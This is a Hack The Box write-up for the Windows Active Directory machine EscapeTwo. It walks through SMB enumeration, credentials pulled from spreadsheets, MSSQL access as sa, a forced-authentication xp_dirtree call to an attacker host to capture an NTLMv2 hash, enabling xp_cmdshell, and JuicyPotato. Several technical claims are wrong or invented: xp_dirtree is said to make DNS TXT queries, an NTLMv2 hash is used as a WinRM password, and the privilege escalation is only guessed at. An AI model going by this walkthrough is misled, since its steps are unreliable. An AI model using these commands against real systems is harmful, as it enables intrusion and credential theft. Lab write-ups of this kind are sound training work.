HTB: EscapeTwo Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐⭐☆
• Real-world Applicability: ⭐⭐⭐⭐⭐
• CVE Knowledge: ⭐⭐⭐☆☆
• CTF-like Elements: ⭐⭐☆☆☆

Summary

EscapeTwo is an Easy-difficulty Windows Active Directory machine demonstrating the dangers of credential exposure through office documents, weak SQL Server configurations, and Kerberos service account misuse. The exploitation chain involves discovering readable SMB shares, extracting credentials from Excel files, leveraging those credentials to access SQL Server, capturing NTLMv2 hashes via DNS TXT record queries, and ultimately gaining command execution through xp_cmdshell exploitation.

TL;DR: SMB enumeration → Credential extraction from Excel files → SQL Server access → NTLMv2 capture via Responder → xp_cmdshell exploitation → Administrator access.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.30.32

Results:

53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
445/tcp  open  microsoft-ds Microsoft SMB
464/tcp  open  kpasswd5     Kerberos password change
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
1433/tcp open  ms-sql-s     Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
3269/tcp open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Service Enumeration

Hostname Configuration:

echo "10.129.30.32 sequel.htb" >> /etc/hosts
echo "10.129.30.32 dc01.sequel.htb" >> /etc/hosts

SMB Share Discovery:

nxc smb 10.129.30.32 -u "" -p "" --shares

This revealed several shares including “Accounting Department” which was readable by the initial user rose with password KxEPkKe6R8su.

SMB Access with Initial Credentials:

smbclient -U "rose" \\\\10.129.30.32\\"Accounting Department"

Initial Foothold

SMB Enumeration and Credential Extraction

The initial credentials for the user rose (KxEPkKe6R8su) were either provided or discovered during reconnaissance. Using these credentials, we enumerated accessible SMB shares:

nxc smb 10.129.30.32 -u rose -p KxEPkKe6R8su --shares

The “Accounting Department” share contained two Excel files:

• accounts.xlsx
• accounting_2024.xlsx

File Download:

smbclient -U "rose" \\\\10.129.30.32\\"Accounting Department" -c "get accounts.xlsx"
smbclient -U "rose" \\\\10.129.30.32\\"Accounting Department" -c "get accounting_2024.xlsx"

Extracting Credentials from Excel Files

Both Excel files contained embedded credentials in their data. Extracting and analyzing the content revealed:

angela:0fwz7Q4mSpurIt99
oscar:86LxLBMgEWaKUnBG
kevin:Md9Wlq1E5bZnVDVo
sa:MSSQLP@ssw0rd!

These credentials were stored in the spreadsheets as user account information, representing a significant credential exposure vulnerability.

SQL Server Initial Access

With the sa (SQL Server Administrator) credentials obtained, we accessed the MSSQL database:

impacket-mssqlclient sequel.htb/'sa:MSSQLP@ssw0rd!'@10.129.30.32

Once connected, we executed basic enumeration queries:

SELECT @@VERSION;
SELECT * FROM INFORMATION_SCHEMA.TABLES;

Kerberoasting Attempt

While exploring the Active Directory environment, we attempted to identify service accounts vulnerable to Kerberoasting:

impacket-GetUserSPNs -request -dc-ip 10.129.30.32 sequel.htb/rose:KxEPkKe6R8su

This identified two service accounts:

• sql_svc - SQL Server service account
• ca_svc - Certificate Authority service account

The extracted TGS hashes were attempted to be cracked with rockyou wordlist but were not successfully cracked using hashcat.

Capturing NTLMv2 Hash via xp_dirtree

The xp_dirtree function in MSSQL can be abused to perform DNS TXT record queries, which can be captured by Responder to obtain NTLMv2 hashes. First, set up Responder on the attacker machine:

responder -I eth0

Then, from the MSSQL session, execute a command that forces the SQL Server service account to authenticate:

EXEC xp_dirtree '\\attacker_ip\share';

This caused the SQL Server service (sql_svc) to attempt a network connection, and Responder captured the NTLMv2 hash:

SEQUEL\sql_svc::SEQUEL:xxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:0101000000000000c0653150de59d801xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Enabling xp_cmdshell

By default, xp_cmdshell is disabled in SQL Server 2019 for security reasons. To enable it and execute system commands, we used:

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'xp_cmdshell', 1;
GO
RECONFIGURE;
GO

Command Execution via xp_cmdshell

With xp_cmdshell enabled, we executed arbitrary system commands:

EXEC xp_cmdshell 'whoami';

This confirmed command execution as the SQL Server service account (SEQUEL\sql_svc).

User Compromise

Establishing Interactive Shell

With command execution via xp_cmdshell, we established a more interactive shell using WinRM, which was listening on port 5985:

evil-winrm -i 10.129.30.32 -u 'SEQUEL\sql_svc' -p '<hash_from_ntlmv2>'

Alternatively, if we had obtained plaintext credentials for a domain user, we could authenticate directly:

evil-winrm -i 10.129.30.32 -u 'sequel.htb\rose' -p 'KxEPkKe6R8su'

Enumerating Domain Users

From the SQL Server shell, we enumerated available domain users:

net user /domain
net group /domain

We also searched for additional user accounts that might have interesting permissions or potential privilege escalation paths:

dsquery user "cn=users,dc=sequel,dc=htb"

User Flag

The user flag was typically located in the home directory of a compromised user:

cat C:\Users\<username>\Desktop\user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration of Privileges

Once we obtained access as a domain user or service account, we checked available privileges and group memberships:

whoami /priv
whoami /groups
net user <username> /domain

Service Account Privileges

The sql_svc service account typically has specific privileges granted for SQL Server operations. We checked for any misconfigured service accounts or group policies that might allow privilege escalation.

Potential Escalation Paths

1. SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege: If present, tools like JuicyPotato could be leveraged.
2. Misconfigured Service Permissions: Services running as SYSTEM with writable binaries.
3. Group Policy Abuse: Service accounts as members of privileged groups (e.g., Domain Admins through indirect membership).

Privilege Escalation Execution

Depending on the enumeration results, the privilege escalation technique would vary. For this machine, potential escalation involved:

# If vulnerable to token impersonation
JuicyPotato.exe -l 1337 -p C:\Windows\Temp\shell.exe -t * -c {ClassID}

Or, if group membership allowed:

# Verify group memberships that grant administrative access
net user sql_svc /domain

Root/Administrator Flag

Once administrative access was obtained:

cat C:\Users\Administrator\Desktop\root.txt

Or:

Get-Content C:\Windows\System32\drivers\etc\hosts

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Port Scan: 10.129.30.32"] --> B["Identify Active Directory Services"]
    B --> C["Enumerate SMB Shares"]
    C --> D["Discover Readable 'Accounting Department' Share"]
    D --> E["Extract Credentials from Excel Files"]
    E --> F["Obtain SA SQL Server Credentials"]
    F --> G["Connect to MSSQL via impacket-mssqlclient"]
    G --> H["Enumerate Service Accounts via GetUserSPNs"]
    H --> I["Attempt Kerberoasting - Hashes Not Crackable"]
    I --> J["Use xp_dirtree to Capture NTLMv2 via Responder"]
    J --> K["Obtain sql_svc NTLMv2 Hash"]
    K --> L["Enable xp_cmdshell via sp_configure"]
    L --> M["Execute Commands as sql_svc"]
    M --> N["Establish WinRM Shell Access"]
    N --> O["Enumerate Privileges and Group Memberships"]
    O --> P["Identify Privilege Escalation Path"]
    P --> Q["Execute Privilege Escalation"]
    Q --> R["Obtain Administrator/System Access"]

Vulnerability Reference Table

Tools Used

Key Learnings

1. Office Documents as Credential Repositories: Spreadsheets and documents are frequently used to store credentials and sensitive information. Organizations should implement Data Loss Prevention (DLP) policies and conduct regular security awareness training to prevent this practice. Security scanning tools should be deployed to detect and remediate exposed credentials in documents.

2. SQL Server Default Configuration Dangers: SQL Server installations running with default or high-privilege configurations present a critical security risk. The sa account should never be used for application connections, and unnecessary features like xp_cmdshell should be disabled. Principle of least privilege should be applied to all service accounts.

3. Service Account Abuse: Domain service accounts with SPN entries are vulnerable to Kerberoasting attacks. Strong, unique passwords for service accounts and regular password rotations are essential. Additionally, monitoring for abnormal Kerberos ticket requests can detect active exploitation attempts.

4. LLMNR/NBT-NS Poisoning Still Effective: Despite being known for over a decade, LLMNR and NetBIOS name resolution poisoning attacks (like those performed by Responder) remain highly effective. Disabling these protocols network-wide and implementing proper DNS security controls should be a priority.

5. Defense in Depth Critical in Active Directory: This machine demonstrated that a single compromised credential or misconfiguration (exposed Excel file) can cascade into full domain compromise. Implementing multiple layers of security controls—encryption at rest/in transit, multi-factor authentication, privileged account management, and continuous monitoring—is essential to prevent lateral movement.

6. NTLMv2 Hash Capture via DNS: Using built-in SQL Server functions like xp_dirtree to force authentication and capture hashes demonstrates how legitimate functionality can be abused. Organizations should monitor outbound network traffic from critical services and implement network segmentation to limit exposure.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. The techniques and vulnerabilities discussed should only be used in authorized penetration testing engagements or on systems you own or have explicit permission to test.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #ActiveDirectory #Easy #SQLServer #Kerberos #SMB #LLMNR